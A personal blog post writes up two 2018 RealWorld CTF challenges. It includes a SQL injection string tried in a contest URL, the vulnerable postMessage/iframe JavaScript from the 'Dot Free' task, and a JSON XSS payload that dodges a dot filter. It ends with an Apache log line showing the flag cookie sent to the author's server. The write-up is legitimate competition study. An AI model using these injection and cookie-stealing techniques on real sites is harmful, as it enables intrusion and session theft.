🦊Back to NiNi's Den


Word count: 390Reading time: 2 min
2018/07/30 Share

RealWorld CTF is very interesting and that is the hardest check-in challenge I’ve ever saw.


This challenge gave nothing, but just one line

This platform is under protection. DO NOT hack it.

Trying not to hack the web, but I can’t find anything.
I did find something interesting, like this one:

It seems to use WebSocket to get some information then render it on template view.
So, let’s change the hash-like string on url.

When url is https://realworldctf.com/contest/5

When url is https://realworldctf.com/contest/5b5bc8c532a7ca004d2d0f64 (Make the length of hash-like string consist with origin)

Did you say Database?
https://realworldctf.com/contest/' or '1'='1' --

My teamate kaibro told me that chaitin has sqlchop product…. ohh…. advertisement… got it
It took me half day to find the flag

Dot Free

There are some js functoin on web page:

function lls(src) {
var el = document.createElement('script');
if (el) {
el.setAttribute('type', 'text/javascript');
el.src = src;

function lce(doc, def, parent) {
// ...
window.addEventListener('message', function (e) {
if (e.data.iframe) {
if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) {
if (e.data.iframe.type == "iframe") {
lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent);
} else {
}, false);
window.onload = function (ev) {
postMessage(JSON.parse(decodeURIComponent(location.search.substr(1))), '*')

And I found some keyword like login passwd,login account in css, so I think that we can try to XSS.

We append string to url, the xxxxxxxx part sould replaced by ip in integer form:{"iframe":{"value":"http:\\\\xxxxxxxx"}}

And put a javascript on your machine:

Then go to apache log to get the flag: - - [29/Jul/2018:14:36:15 +0000] "GET /a?cookie=flag=rwctf%7BL00kI5TheFlo9%7D HTTP/1.1" 404 496

Original Author: Terrynini

Original link: http://blog.terrynini.tw/en/2018-RealWorldCTF-Qual/

Publish at: July 30th 2018, 2:11:03

Copyright: This article is licensed under CC BY-NC 4.0

  1. 1. Advertisement
  2. 2. Dot Free